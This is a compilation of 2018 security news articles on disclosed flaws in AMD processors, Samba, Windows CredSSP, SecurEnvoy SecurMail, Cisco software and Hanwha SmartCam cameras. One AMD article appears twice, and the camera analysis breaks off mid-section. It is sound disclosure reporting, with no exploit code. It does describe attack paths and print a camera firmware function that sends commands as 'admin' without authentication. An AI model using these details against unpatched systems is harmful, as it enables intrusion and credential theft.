Let’s see in detail the vulnerabilities:

Chimera is a flaw in Ryzen workstation and Ryzen Pro, it includes two sets of manufacturer backdoor flaws that allow malicious code to be injected into the Ryzen chipsets. The exploitation of Chimera issued could allow attackers to install malware to leverage the Direct Memory Access engine to attack the operating system.
“Chipset-based malware could evade virtually all endpoint security solutions on the market.” reads the analysis.

“Malware running on the chipset could leverage the latter’s Direct Memory Access (DMA) engine to attack the operating system. This kind of attack has been demonstrated.”

The Ryzenfall impacts AMD’s Ryzen workstation, Pro and mobile lineups, it could allow attackers to inject a malicious code to take complete control over the AMD Secure Processor and leverage the technology’s privileges to read and write protected memory areas (including SMRAM and the Windows Credential Guard isolated memory).
Attackers could use RYZENFALL to bypass Windows Credential Guard, steal network credentials, and then potentially spread through even highly secure Windows corporate networks.” continues the analysis.

“Attackers could use RYZENFALL in conjunction with MASTERKEY to install persistent malware on the Secure Processor, exposing customers to the risk of covert and long-term industrial espionage.”

Fallout vulnerabilities impact AMD’s EPYC server chips and could be exploited to read from and write to protected memory areas including SMRAM and Windows Credential Guard isolated memory (VTL-1).
“An attacker could leverage these vulnerabilities to bypass BIOS flashing protections that are implemented in SMM.”

Masterkey flaw breaks down into three separate vulnerabilities found in AMD’s Secure Processor firmware, they can be exploited to infiltrate the Secure Processor in EPYC server, Ryzen workstation, Ryzen Pro and Ryzen mobile chips.
“The flaw facilitates network credential theft by allowing Windows Credential Guard to be bypassed.” states the report. “Physical damage and bricking of hardware. Could be used by attackers in hardware-based “ransomware” scenarios.”

Many of the flaws are firmware vulnerabilities and it could take much time to address them, while the Chimera hardware vulnerabilities cannot be fixed.

It is still unclear if the flaws are currently being exploited in the wild.


Samba fixed two critical vulnerabilities, update your version as soon as possible
14.3.2018 securityaffairs 
Vulnerebility

Maintainers at the Samba project have released new versions of the popular networking software to fix two critical vulnerabilities.
Maintainers at the Samba project have released new versions of the popular open-source networking software to address two critical vulnerabilities that could be exploited by unprivileged remote attackers to launch DoS attacks against servers and change any users’ passwords, including administrators ‘ones.

Samba has provided secure and fast file and print services for all clients using the SMB/CIFS protocol, it allows non-Windows operating systems, like GNU/Linux or Mac OS X, to share network shared folders, files, and printers with Windows OS.

The maintainers of Samba have addressed the vulnerabilities with the release of the Samba versions 4.7.6, 4.6.14, 4.5.16.

The first DoS vulnerability tracked as CVE-2018-1050 could be exploited “when the RPC spoolss service is configured to be run as an external daemon.”

The vulnerability is caused by the lack of input sanitizations checks on some parameters and affects all versions of Samba from 4.0.0 onwards.

“Missing input sanitization checks on some of the input parameters to spoolss RPC calls could cause the print spooler service to crash. If the RPC spoolss service is left by default as an internal service, all a client can do is crash its own authenticated connection.” reads the security advisory.

samba critical vulnerabilities

A second flaw, tracked CVE-2018-1057, could be exploited by unprivileged authenticated users to change any other users’ passwords, including admin users, over LDAP. Samba doesn’t properly validate permissions of users when they request to modify passwords over LDAP.

The flaw only impacts on the Samba Active Directory DC, all versions of Samba’s AD DC and pre-release versions since Samba 4.0.0alpha13 are affected by this vulnerability.

Administrators need to update vulnerable servers immediately; further details have been published on the “Samba Security Releases” page.


A critical flaw in Credential Security Support Provider protocol (CredSSP) affects all versions of Windows
14.3.2018 securityaffairs 
Vulnerebility

Security experts at firm Preempt Security discovered a critical vulnerability in Credential Security Support Provider protocol (CredSSP) that affects all versions of Windows to date.
The flaw, tracked as CVE-2018-0886, could be used by a remote attacker to exploit RDP (Remote Desktop Protocol) and Windows Remote Management (WinRM) to steal data and run malicious code.

The vulnerability is a logical cryptographic issue in CredSSP that can be exploited by an attacker in a man-in-the-middle position to steal session authentication data and perform a Remote Procedure Call attack.

An attacker with WiFi/Physical access to your network could easily launch a man-in-the-middle attack.

The CredSSP protocol enables an application to securely delegate a user’s credentials from a client to a target server, it works with both RDP and WinRM.

When a client and server authenticate over RDP and WinRM, a man-in-the-middle attacker can execute remote commands on the target system. The attacker waits for a CredSSP session to occur, then it will steal session authentication and perform a Remote Procedure Call (DCE/RPC) attack on the server that the user originally connected to.

“An attacker which have stolen a session from a user with sufficient privileges could run different commands with local admin privileges. This is especially critical in case of domain controllers, where most Remote Procedure Calls (DCE/RPC) are enabled by default,” explained Yaron Zinar, security experts for Preempt.

“This could leave enterprises vulnerable to a variety of threats from attackers including lateral movement and infection on critical servers or domain controllers.”

CredSSP

Researchers discovered the flaw in August 2017 and reported it to Microsoft that solved the issued today as part of March 2018 Patch Tuesday.

Users need to patch their installs by updating security updates issued by Microsoft.

Preempt researchers pointed out that patching alone is necessary but not sufficient to the exploitation of the flaw. Admins need to make some configuration to apply the patch and be secure.

“However, it is important to note that patching alone is not enough as you will also need to make a configuration change to apply the patch and be protected. For further details on how to apply the patch refer to Microsoft advisory.” continues the security advisory.

“As with many previous exploits, blocking the relevant application ports/services (RDP, DCE/RPC) would also thwart the attack. It is recommended to apply the proper network segmentation policy and block unnecessary ports/services.”

Another best practice to follow consist of decreasing the use of privileged account as much as possible in favor of non-privileged accounts is possible.


13 Critical Flaws Discovered in AMD Ryzen and EPYC Processors
13.3.2018 thehackernews
Vulnerebility

Security researchers have discovered 13 critical Spectre/Meltdown-like vulnerabilities throughout AMD's Ryzen and EPYC lines of processors that could allow attackers to access sensitive data, install persistent malware inside the chip, and gain full access to the compromised systems.
All these vulnerabilities lie in the secure part of the AMD's Zen architecture processors and chipsets—typically where device stores sensitive information such as passwords and encryption keys and makes sure nothing malicious is running when you start your PC.
The unpatched vulnerabilities are categorized into four classes—RYZENFALL, FALLOUT, CHIMERA, and MASTERKEY—and threaten wide-range of servers, workstations, and laptops running vulnerable AMD Ryzen, Ryzen Pro, Ryzen Mobile or EPYC processors.

Discovered by the team of researchers at Israel-based CTS-Labs, newly disclosed vulnerabilities defeat AMD's Secure Encrypted Virtualization (SEV) technology and could allow attackers to bypass Microsoft Windows Credential Guard to steal network credentials.
Moreover, researchers also found two exploitable manufacturer backdoors inside Ryzen chipset that could allow attackers to inject malicious code inside the chip.

AMD's Ryzen chipsets are found in desktop and laptop computers, while EPYC processors in servers. Researchers successfully tested the vulnerabilities in 21 different products and believed 11 more products are also vulnerable to the issues.
Here's the brief explanation of all the vulnerabilities:
RYZENFALL (v1, v2, v3, v4) AMD Vulnerabilities
These flaws reside in AMD Secure OS and affect Ryzen secure processors (workstation/pro/mobile).

According to researchers, RYZENFALL vulnerabilities allow unauthorized code execution on the Ryzen Secure Processor, eventually letting attackers access protected memory regions, inject malware into the processor itself, and disable SMM protections against unauthorized BIOS reflashing.
Attackers could also use RYZENFALL to bypass Windows Credential Guard and steal network credentials, and then use the stolen data to spread across to other computers within that network (even highly secure Windows corporate networks).
RYZENFALL can also be combined with another issue called MASTERKEY (detailed below) to install persistent malware on the Secure Processor, "exposing customers to the risk of covert and long-term industrial espionage."
FALLOUT (v1, v2, v3) AMD Vulnerabilities
These vulnerabilities reside in the bootloader component of EPYC secure processor and allow attackers to read from and write to protected memory areas, such as SMRAM and Windows Credential Guard isolated memory.
FALLOUT attacks only affect servers using AMD's EPYC secure processors and could be exploited to inject persistent malware into VTL1, where the Secure Kernel and Isolated User Mode (IUM) execute code.


Like RYZENFALL, FALLOUT also let attackers bypass BIOS flashing protections, and steal network credentials protected by Windows Credential Guard.
"EPYC servers are in the process of being integrated into data centers around the world, including at Baidu and Microsoft Azure Cloud, and AMD has recently announced that EPYC and Ryzen embedded processors are being sold as high-security solutions for mission-critical aerospace and defense systems," researchers say.
"We urge the security community to study the security of these devices in depth before allowing them on mission-critical systems that could potentially put lives at risk."
CHIMERA (v1, v2) AMD Vulnerabilities
These two vulnerabilities are actually hidden manufacturer backdoors inside AMD's Promontory chipsets that are an integral part of all Ryzen and Ryzen Pro workstations.

One backdoor has been implemented in firmware running on the chip, while the other in the chip's hardware (ASIC), and allow attackers to run arbitrary code inside the AMD Ryzen chipset, or to re-flash the chip with persistent malware.
Since WiFi, network and Bluetooth traffic flows through the chipset, an attacker could exploit the chipset's man-in-the-middle position to launch sophisticated attacks against your device.
"This, in turn, could allow for firmware-based malware that has full control over the system, yet is notoriously difficult to detect or remove. Such malware could manipulate the operating system through Direct Memory Access (DMA), while remaining resilient against most endpoint security products," researchers say.
According to the researchers, it may be possible to implement a stealthy keylogger by listening to USB traffic that flows through the chipset, allowing attackers to see everything a victim types on the infected computer.
"Because the latter has been manufactured into the chip, a direct fix may not be possible, and the solution may involve either a workaround or a recall," researchers warn.
MASTERKEY (v1, v2, v3) AMD Vulnerabilities
These three vulnerabilities in EPYC and Ryzen (workstation/pro/mobile) processors could allow attackers to bypass hardware validated boot to re-flash BIOS with a malicious update and infiltrate the Secure Processor to achieve arbitrary code execution.
Like RYZENFALL and FALLOUT, MASTERKEY also allows attackers to install stealthy and persistent malware inside AMD Secure Processor, "running in kernel-mode with the highest possible permissions," as well as bypass Windows Credential Guard to facilitate network credential theft.
MASTERKEY vulnerabilities also allow attackers to disable security features such as Firmware Trusted Platform Module (fTPM) and Secure Encrypted Virtualization (SEV).
CTS-Lab researchers gave just 24 hours to the AMD team to look at all vulnerabilities and respond before going public with their details—that's hell quick for any company to understand and patch the critical level issues properly.

While Intel and Microsoft are still managing its patches for Meltdown and Spectre vulnerabilities, the newly discovered vulnerabilities could create similar trouble for AMD and its customers.
So, let's wait and watch when the company comes up with fixes, though the researchers said it could take "several months to fix" all the issues.
For more detailed information about the vulnerabilities, you can head on to this paper [PDF] titled, "Severe Security Advisory on AMD Processors," published by CTS-Lab.


13 Critical Flaws Discovered in AMD Ryzen and EPYC Processors
13.3.2018 thehackernews
Vulnerebility

Security researchers have discovered 13 critical Spectre/Meltdown-like vulnerabilities throughout AMD's Ryzen and EPYC lines of processors that could allow attackers to access sensitive data, install persistent malware inside the chip, and gain full access to the compromised systems.
All these vulnerabilities lie in the secure part of the AMD's Zen architecture processors and chipsets—typically where device stores sensitive information such as passwords and encryption keys and makes sure nothing malicious is running when you start your PC.
The unpatched vulnerabilities are categorized into four classes—RYZENFALL, FALLOUT, CHIMERA, and MASTERKEY—and threaten wide-range of servers, workstations, and laptops running vulnerable AMD Ryzen, Ryzen Pro, Ryzen Mobile or EPYC processors.

Discovered by the team of researchers at Israel-based CTS-Labs, newly disclosed vulnerabilities defeat AMD's Secure Encrypted Virtualization (SEV) technology and could allow attackers to bypass Microsoft Windows Credential Guard to steal network credentials.
Moreover, researchers also found two exploitable manufacturer backdoors inside Ryzen chipset that could allow attackers to inject malicious code inside the chip.

AMD's Ryzen chipsets are found in desktop and laptop computers, while EPYC processors in servers. Researchers successfully tested the vulnerabilities in 21 different products and believed 11 more products are also vulnerable to the issues.
Here's the brief explanation of all the vulnerabilities:
RYZENFALL (v1, v2, v3, v4) AMD Vulnerabilities
These flaws reside in AMD Secure OS and affect Ryzen secure processors (workstation/pro/mobile).

According to researchers, RYZENFALL vulnerabilities allow unauthorized code execution on the Ryzen Secure Processor, eventually letting attackers access protected memory regions, inject malware into the processor itself, and disable SMM protections against unauthorized BIOS reflashing.
Attackers could also use RYZENFALL to bypass Windows Credential Guard and steal network credentials, and then use the stolen data to spread across to other computers within that network (even highly secure Windows corporate networks).
RYZENFALL can also be combined with another issue called MASTERKEY (detailed below) to install persistent malware on the Secure Processor, "exposing customers to the risk of covert and long-term industrial espionage."
FALLOUT (v1, v2, v3) AMD Vulnerabilities
These vulnerabilities reside in the bootloader component of EPYC secure processor and allow attackers to read from and write to protected memory areas, such as SMRAM and Windows Credential Guard isolated memory.
FALLOUT attacks only affect servers using AMD's EPYC secure processors and could be exploited to inject persistent malware into VTL1, where the Secure Kernel and Isolated User Mode (IUM) execute code.


Like RYZENFALL, FALLOUT also let attackers bypass BIOS flashing protections, and steal network credentials protected by Windows Credential Guard.
"EPYC servers are in the process of being integrated into data centers around the world, including at Baidu and Microsoft Azure Cloud, and AMD has recently announced that EPYC and Ryzen embedded processors are being sold as high-security solutions for mission-critical aerospace and defense systems," researchers say.
"We urge the security community to study the security of these devices in depth before allowing them on mission-critical systems that could potentially put lives at risk."
CHIMERA (v1, v2) AMD Vulnerabilities
These two vulnerabilities are actually hidden manufacturer backdoors inside AMD's Promontory chipsets that are an integral part of all Ryzen and Ryzen Pro workstations.

One backdoor has been implemented in firmware running on the chip, while the other in the chip's hardware (ASIC), and allow attackers to run arbitrary code inside the AMD Ryzen chipset, or to re-flash the chip with persistent malware.
Since WiFi, network and Bluetooth traffic flows through the chipset, an attacker could exploit the chipset's man-in-the-middle position to launch sophisticated attacks against your device.
"This, in turn, could allow for firmware-based malware that has full control over the system, yet is notoriously difficult to detect or remove. Such malware could manipulate the operating system through Direct Memory Access (DMA), while remaining resilient against most endpoint security products," researchers say.
According to the researchers, it may be possible to implement a stealthy keylogger by listening to USB traffic that flows through the chipset, allowing attackers to see everything a victim types on the infected computer.
"Because the latter has been manufactured into the chip, a direct fix may not be possible, and the solution may involve either a workaround or a recall," researchers warn.
MASTERKEY (v1, v2, v3) AMD Vulnerabilities
These three vulnerabilities in EPYC and Ryzen (workstation/pro/mobile) processors could allow attackers to bypass hardware validated boot to re-flash BIOS with a malicious update and infiltrate the Secure Processor to achieve arbitrary code execution.
Like RYZENFALL and FALLOUT, MASTERKEY also allows attackers to install stealthy and persistent malware inside AMD Secure Processor, "running in kernel-mode with the highest possible permissions," as well as bypass Windows Credential Guard to facilitate network credential theft.
MASTERKEY vulnerabilities also allow attackers to disable security features such as Firmware Trusted Platform Module (fTPM) and Secure Encrypted Virtualization (SEV).
CTS-Lab researchers gave just 24 hours to the AMD team to look at all vulnerabilities and respond before going public with their details—that's hell quick for any company to understand and patch the critical level issues properly.

While Intel and Microsoft are still managing its patches for Meltdown and Spectre vulnerabilities, the newly discovered vulnerabilities could create similar trouble for AMD and its customers.
So, let's wait and watch when the company comes up with fixes, though the researchers said it could take "several months to fix" all the issues.
For more detailed information about the vulnerabilities, you can head on to this paper [PDF] titled, "Severe Security Advisory on AMD Processors," published by CTS-Lab.


Critical Vulnerabilities Addressed in SecurEnvoy SecurMail
13.3.2018 securityweek 
Vulnerebility

Multiple critical vulnerabilities impacting SecurEnvoy SecurMail could result in an attacker being able to read encrypted emails and even delete or overwrite messages in an inbox.

SecurEnvoy SecurMail was meant to provide businesses with secure email communications and claims to be offering organizations the full advantages of encryption without the hassle of deployment or management operations.

This week, SEC Consult revealed information on seven critical vulnerabilities in the product that “break the core security promises of the product,” as they can expose sensitive information to attackers.

The flaws were discovered during a short testing period in November 2017, SEC Consult reveals in an advisory. The discovered vulnerabilities were recently addressed with the release of SecurMail 9.2.501, or hotfix patch “1_012018.”

“As other SecureEnvoy products (besides the analyzed SecurMail) appear to be highly integrated (all products are installed with a single setup file) we suspect other components to also suffer from severe security deficits,” SEC Consult notes.

The discovered vulnerabilities include two Cross Site Scripting (CVE-2018-7703, CVE-2018-7707) flaws residing in the lack of functionality to encode user input when creating HTML pages.

The security firm also found that there are no path traversal checks in the application (CVE-2018-7705, CVE-2018-7706), and that authorization checks are only partially implemented in the application, an Insecure Direct Object Reference (CVE-2018-7704) vulnerability. These flaws could allow a legitimate recipient to read mails sent to other recipients in plain text.

The application was also plagued with a Missing Authentication and Authorization (CVE-2018-7702) flaw, where no authentication was required on the SecurEnvoy server for a client to send emails. This could allow anyone with network access to the server to arbitrarily send emails spoofing other sender addresses.

The issue could also be exploited by attackers with network access to the server to resend previous communication to arbitrary recipients. Thus, they could extract all emails stored on the server and could also modify arbitrary messages.

SecurEnvoy SecurMail was also impacted by a Cross Site Request Forgery (CVE-2018-7701) vulnerability, as no protections against such flaws existed within the web interface. Thus, an attacker could delete a victim's email or impersonate the victim and reply to their emails. Attacks are possible against the API used to send emails, which do not require authentication on the server.

“Since these vulnerabilities were found during a very short time frame, SEC Consult believes that the product may contain a large number of other security vulnerabilities. As already several core security promises have been broken during this short crash test, no further tests were conducted,” SEC Consult notes.

The vulnerabilities were found in SecurEnvoy SecurMail version 9.1.501 and were addressed with security patch “1_012018.” Version 9.2.501 of the software is no longer vulnerable.

In their advisory, SEC Consult also published proof-of-concept code for the discovered vulnerabilities.


Update Samba Servers Immediately to Patch Password Reset and DoS Vulnerabilities
13.3.2018 thehackernews
Vulnerebility
Samba maintainers have just released new versions of their networking software to patch two critical vulnerabilities that could allow unprivileged remote attackers to launch DoS attacks against servers and change any other users' passwords, including admin's.
Samba is open-source software (re-implementation of SMB networking protocol) that runs on the majority of operating systems available today, including Windows, Linux, UNIX, IBM System 390, and OpenVMS.
Samba allows non-Windows operating systems, like GNU/Linux or Mac OS X, to share network shared folders, files, and printers with Windows operating system.
The denial of service vulnerability, assigned CVE-2018-1050, affects all versions of Samba from 4.0.0 onwards and could be exploited "when the RPC spoolss service is configured to be run as an external daemon."
"Missing input sanitization checks on some of the input parameters to spoolss RPC calls could cause the print spooler service to crash. If the RPC spoolss service is left by default as an internal service, all a client can do is crash its own authenticated connection." Samba advisory says.
The second vulnerability, assigned CVE-2018-1057, allows unprivileged authenticated users to change any other users' passwords, including admin users, over LDAP.
Password reset flaw exists on all versions of Samba from 4.0.0 onwards, but works only in Samba Active Directory DC implementation, as it doesn't properly validate permissions of users when they request to modify passwords over LDAP.


A large number of servers might potentially be at risk, because Samba ships with a wide range of Linux distributions.
The maintainers of Samba have addressed both vulnerabilities with the release of new Samba versions 4.7.6, 4.6.14, 4.5.16 and have advised administrators to update vulnerable servers immediately.
If you are running an older version of Samba, check this page for contributed patches, if available.


13 Vulnerabilities in Hanwha SmartCams Demonstrate Risks of Feature Complexity
13.3.2018 securityaffairs
Vulnerebility

The researchers at Kaspersky Lab ICS CERT decided to check the popular Hanwha SmartCams and discovered 13 vulnerabilities.
Wikipedia describes Attack Surface, as “[the] sum of the different points (the “attack vectors”) where an unauthorized user (the “attacker”) can try to enter data to or extract data from an environment.”

Basically, the more points there are to compromise a system, the more likely the system will be compromised. In the Internet of Things (IoT) development, the potentially vulnerable points correlate to features — and the Hanwha SNH-V6410PN/PNW SmartCam has a lot of them.

A few of the features listed on the manufacturer’s website: remote control from your smartphone via wifi, two-way communication via built-in microphone, record video or still images to your smart device, event notification.

All of these present a potential vulnerability point to be exploited. In the case of this Samsung-branded SmartCam, it looks like all of them are vulnerable as security researcher Kaspersky documented 13 separate vulnerabilities:

Use of insecure HTTP protocol during firmware update
Use of insecure HTTP protocol during camera interaction via HTTP API
An undocumented (hidden) capability for switching the web interface using the file ‘dnpqtjqltm’
Buffer overflow in file ‘dnpqtjqltm’ for switching the web interface
A feature for the remote execution of commands with root privileges
A capability to remotely change the administrator password
Denial of service for SmartCam
No protection from brute force attacks for the camera’s admin account password
A weak password policy when registering the camera on the server samsungsmartcam.com. Attacks against users of SmartCam applications are possible
Communication with other cameras is possible via the cloud server
Blocking of new camera registration on the cloud server
Authentication bypass on SmartCam. Change of administrator password and remote execution of commands.
Restoration of camera password for the SmartCam cloud account
This looks like a lot of vulnerabilities but is not surprising when you have an IoT device that offers a wide range of features like the SmartCam. Combining hardware that acts like a web server, with a cloud server, streaming video and audio and support mobile application creates a lot of places to make mistakes.

By relying on HTTP instead of encrypted HTTPS, it becomes possible for bad actors to inject their own code into firmware updates as they are downloaded to the cameras or to control the camera and microphone as they choose when controlling the SmartCam via HTTP interface.

Hanwha 180312-cameras-somebodys-watching-1

The developers also missed some very basic account management security controls. Being able to change admin account passwords remotely could allow an attacker to load their own malicious code on the camera to send video to the destination of their choosing, lockout the legitimate user from their hardware, participate in a botnet, even mine for the cryptocurrency.

Even if the camera is hidden behind a firewall, the poorly implemented password controls in the cloud service offer a channel for the bad actors to find and control the camera.

There is even an interesting attack vector where the attacker “clones” the individual’s camera such that the victim sees the video feed from the attacker’s camera instead of their own. One can imagine a Hollywood movie scene where a security camera feed is replaced with the view from an empty hallway while the criminals walk through the building with impunity.

These cameras are also subject to the common Denial of Service vulnerabilities often found in IoT devices. There is one unique method that leverages the cloud service in this case. If the bad actor is able to register the camera details first, the legitimate customer will be unable to register and their SmartCam becomes useless.

In a blog post on March 12, Vladimir Dashchenko confirmed that these vulnerabilities exist “not only in the camera being researched but all manufacturer’s smart cameras manufactured by Hanwha Techwin. The latter also makes firmware for Samsung cameras.”

Following notification from the researcher, Hanwha has started to release firmware updates to fix the vulnerabilities, but this work continues. Details about the fixed vulnerabilities are available from the following CVEs: CVE-2018-6294, CVE-2018-6295, CVE-2018-6296, CVE-2018-6297, CVE-2018-6298, CVE-2018-6299, CVE-2018-6300, CVE-2018-6301, CVE-2018-6302, CVE-2018-6303.

It is tempting to purchase the solution with the most features for the lowest price because it feels like the best deal. However, getting to the lowest price usually requires compromises and are you getting a deal if the compromises come in features you don’t need?


Cisco Patches Hard-coded Password in PCP Software
12.3.2018 securityweek
Vulnerebility

Cisco this week announced the availability of software updates to address a hard-coded password vulnerability in Cisco Prime Collaboration Provisioning (PCP) Software.

Due to the existence of the hard-coded account password, an unauthenticated, local attacker could log into the underlying Linux operating system. The vulnerability can be abused to connect to the affected system via Secure Shell (SSH) using the hard-coded credentials.

According to Cisco, an attacker successfully exploiting the vulnerability could access the underlying operating system as a low-privileged user. However, the attacker could elevate privileges to root and take full control of the vulnerable system.

Because of the privilege escalation possibility, the vulnerability has a Security Impact Rating (SIR) of Critical, although it was also assessed with a Common Vulnerability Scoring System (CVSS) Base score of 5.9, which would normally come with a SIR of Medium.

The vulnerability impacts Cisco PCP Software release 11.6 only and no prior builds were found to be affected by it, Cisco notes in an advisory. Impacted customers should update to Cisco PCP releases 12.1 and later, as no workarounds that address this vulnerability exist.

The company also notes that it is not aware of “any public announcements or malicious use of the vulnerability.”

This week, the company also addressed CVE-2018-0147, a Critical (CVSS base score of 9.8) vulnerability in Java deserialization used by Cisco Secure Access Control System (ACS), which could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device.

“The vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by sending a crafted serialized Java object. An exploit could allow the attacker to execute arbitrary commands on the device with root privileges,” Cisco explains.

The company also addressed a High risk (CVSS base score of 7.3) bug in the FTP server of the Cisco Web Security Appliance (WSA). Due to incorrect FTP user credential validation, an unauthenticated, remote attacker could exploit the bug to log into the server without a valid password or username.

This security issue affects Cisco AsyncOS for WSA Software running any release of Cisco AsyncOS 10.5.1 for WSA Software. Cisco AsyncOS 10.5.2-042 or later releases address the flaw.

Multiple Medium severity bugs were addressed in other Cisco products.


Remotely Exploitable Flaws Found in SmartCam Cameras
12.3.2018 securityweek
Vulnerebility

Hanwha’s SmartCam cameras are affected by more than a dozen vulnerabilities, including critical flaws that can be exploited remotely to take control of devices.

The impacted cameras are widely used for surveillance and monitoring. They can record at high resolutions, they have night vision capabilities and motion sensors, and they allow their users to talk to the person being monitored via a built-in speaker. The product can be controlled remotely from any type of device and all the recorded video is stored in the cloud.

Samsung Electronics sold its Samsung Techwin security division to South Korean conglomerate Hanwha Group in 2014. However, Hanwha’s SmartCam products are still branded “Samsung.”

Researchers have analyzed these devices and discovered a significant number of flaws. The issues were disclosed last week by Vladimir Dashchenko, senior security researcher at Kaspersky Lab, at the company’s Security Analyst Summit (SAS) in Cancun. The security firm also published a blog post on Monday describing the findings.Vulnerabilities found in Hanwha SmartCam cameras

The vulnerabilities can be exploited for intercepting traffic due to the use of HTTP for firmware updates and interaction with the camera, manipulating the web-based user interface, remote code execution with root privileges, denial-of-service (DoS) attacks, brute-force attacks on the admin account, and bypassing authentication.

Experts have identified roughly 2,000 IP addresses associated with cameras exposed to the Internet, but they believe the actual number of vulnerable devices is much higher considering that the flaws can be exploited even against devices that are not directly accessible from the Web due to weaknesses in the SmartCam cloud infrastructure.

Vulnerabilities found in Hanwha SmartCam cameras

One of the flaws found by Kaspersky can be exploited to register cameras that have yet to be registered. This not only prevents legitimate owners from registering and using their cameras, but also allows hackers to take control of the cameras they have registered.

Due to vulnerabilities in the cloud infrastructure, an attacker could have spoofed the update server in an effort to push malicious firmware to a device. Modified firmware can provide privileged access to the targeted camera, serving as an entry point to the rest of the network housing the device, experts say.

Researchers also discovered that a hacker can easily clone a camera in an effort to spoof its video feed.

“The attacker then resets the password using a vulnerability in the password generation algorithm and modifies the firmware of the cloned camera (which is an identical camera located on the attacker’s side). The victim’s camera is then remotely disabled. As a result, the victim will receive a video signal from the attacker’s cloned camera,” Kaspersky researchers explained.

The setup process for the cameras also involves providing credentials for social media and other online services for sending notifications to the user, which can be abused by cybercriminals for phishing and spam campaigns.

Dashchenko told SecurityWeek that remote attacks against these cameras are a multi-stage process that starts with identifying the targeted device’s serial number and MAC address. The serial number can be obtained by either guessing or brute-forcing it.

Large-scale attacks are also possible with the use of scripts and automation mechanisms, Dashchenko said.

Kaspersky’s ICS-CERT team has conducted its research on Hanwha SNH-V6410PN/PNW SmartCam devices, but the same firmware is used for multiple camera models — different features in the firmware are active depending on the model — which means many of the company’s products are likely affected by these vulnerabilities.

The vendor patched many of the vulnerabilities shortly after being notified and Kaspersky has only disclosed the details of the flaws that have been fixed.


Somebody’s watching! When cameras are more than just ‘smart’
12.3.2018 Kaspersky 
Vulnerebility
Every year the number of smart devices grows. Coffee machines, bracelets, fridges, cars and loads of other useful gadgets have now gone smart. We are now seeing the emergence of smart streets, roads and even cities.

Devices such as smart cameras have long been part of everyday life for many, as communication devices, components in security and video surveillance systems, to keep an eye on pets, etc.

The latest smart cameras can connect to the cloud. This is done so that a user can watch what’s happening at a remote location using a variety of devices.

The researchers at Kaspersky Lab ICS CERT decided to check the popular smart camera to see how well protected it is against cyber abuses. This model has a rich feature list, compares favorably to regular webcams and can be used as a baby monitor, a component in a home security system or as part of a monitoring system.

An initial analysis using publicly available sources showed that there are almost 2,000 of these cameras on the Internet with public IP addresses.

Hanwha SNH-V6410PN/PNW SmartCam: specifications
This device is capable of capturing video with resolutions of 1920×1080, 1280×720 or 640×360, it has night vision capability and a motion sensor, and supports two-way communication, i.e. apart from capturing video and sound it can also produce sound using an in-built speaker. The camera works via a cloud-based service; in other words, it doesn’t connect directly to a device such as a computer. It is configured by creating a wireless hotspot on the camera and connecting it to the main router via Wi-Fi. Users can control the camera from their smartphones, tablets or computers. It should be noted that the camera’s data can only be uploaded to the cloud; there is no other way of communicating between the user and the camera.

The camera is based on the Ambarella S2L system (ARM architecture). Amboot is used as its initial loader. After a standard boot, Amboot loads the Linux core with a specific command as a parameter:

console=ttyS0 ubi.mtd=lnx root=ubi0:rootfs rw rootfstype=ubifs init=/linuxrc model=SNH-V6410PN ethaddr=************ sn=ZC7D6V2H*********
s=c

After that, systemd launches. The system then boots as normal. Different partitions are mounted, and commands from rc.local are executed. When executing rc.local, the file mainServer is launched in daemon mode, which is the core of the camera’s operation logic. mainServer executes the commands that are sent to it via UNIX socket /tmp/ipc_path via binary protocol. Scripts written in PHP as well as CGI are used to process user files. While launching, mainServer opens UNIX socket /ipc_path. Analysis of the PHP scripts has shown that the main function responsible for communication with mainServer is in the file /work/www/htdocs_weboff/utils/ipc_manager.php.

Interaction with the cameras is via the cloud only

Communication with the user
When a command arrives from the user (e.g., to rotate the camera, select a tracking area, switch to night vision mode, etc.), it is analyzed. Each command or parameter has its own flag assigned to it, which is a constant. The main flags are documented in the file /work/www/htdocs_weboff/utils/constant.php. Later on, the packet header and payload is created, and a request is sent via UNIX socket /tmp/ipc_path to mainServer.

An analysis of the file ipc_manager.php shows that no authentication is used at this stage. The request is sent on behalf of the user ‘admin’.

function makeHeader($cmd, $act, $type, $len){
$header = array();
$header = array_fill(0, 77, 0x00);
$header[HEADER_OFF_MAGIC_NUMBER] = 0xFE;
$header[HEADER_OFF_MAGIC_NUMBER+1] = 0xFF;
$header[HEADER_OFF_MAGIC_NUMBER+2] = 0xFE;
$header[HEADER_OFF_MAGIC_NUMBER+3] = 0xFF;
$header[HEADER_OFF_MAJOR_VERSION] = MAJOR_VERSION; //Major Version
$header[HEADER_OFF_MINOR_VERSION] = MINOR_VERSION; //Minor Version
int2byte($header, $cmd, HEADER_OFF_COMMAND); //Command
$header[HEADER_OFF_ACTION] = $act; //Action
$header[HEADER_OFF_MSG_TYPE] = $type; //Type
$header[HEADER_OFF_ERROR_CODE] = 0xFF; //Error Code
int2byte($header, $len, HEADER_OFF_MSG_LENGTH); //Length
str2byte($header, “127.0.0.1“, HEADER_OFF_PEER_IP, 40); //Peer IP[40]
int2byte($header, 80, HEADER_OFF_PEER_PORT); //Peer Port
str2byte($header, “admin“, HEADER_OFF_PEER_ACCOUNT, 16); //Peer Account[16] – Current user name
$header = array_merge($header, array_fill(0, 8, 0xFF)); //Reserved[8]
return $header;
}

Example of a request sent on behalf of admin

This method of communicating commands is used when camera communication is done both via HTTP API and via SmartCam applications. In the latter case, the packet is generated in the application itself and sent to the camera in a message body using the XMPP protocol. When accessing this file from the outside via HTTP API and SmartCam application, it can be accessed only through web server digest authentication.

Loopholes for intruders
The following vulnerabilities were identified during the research:

Use of insecure HTTP protocol during firmware update
Use of insecure HTTP protocol during camera interaction via HTTP API
An undocumented (hidden) capability for switching the web interface using the file ‘dnpqtjqltm’
Buffer overflow in file ‘dnpqtjqltm’ for switching the web interface
A feature for the remote execution of commands with root privileges
A capability to remotely change the administrator password
Denial of service for SmartCam
No protection from brute force attacks for the camera’s admin account password
A weak password policy when registering the camera on the server xmpp.samsungsmartcam.com. Attacks against users of SmartCam applications are possible
Communication with other cameras is possible via the cloud server
Blocking of new camera registration on the cloud server
Authentication bypass on SmartCam. Change of administrator password and remote execution of commands.
Restoration of camera password for the SmartCam cloud account
After some additional research we established that these problems exist not only in the camera being researched but all manufacturer’s smart cameras manufactured by Hanwha Techwin. The latter also makes firmware for Samsung cameras.

Below we give a more detailed account of some of our findings.

Undocumented functionality
As mentioned above, we detected, among others, an undocumented capability that allows manipulations with the camera’s web interface.

Code with undocumented functionality capability in Hanwha SmartCam

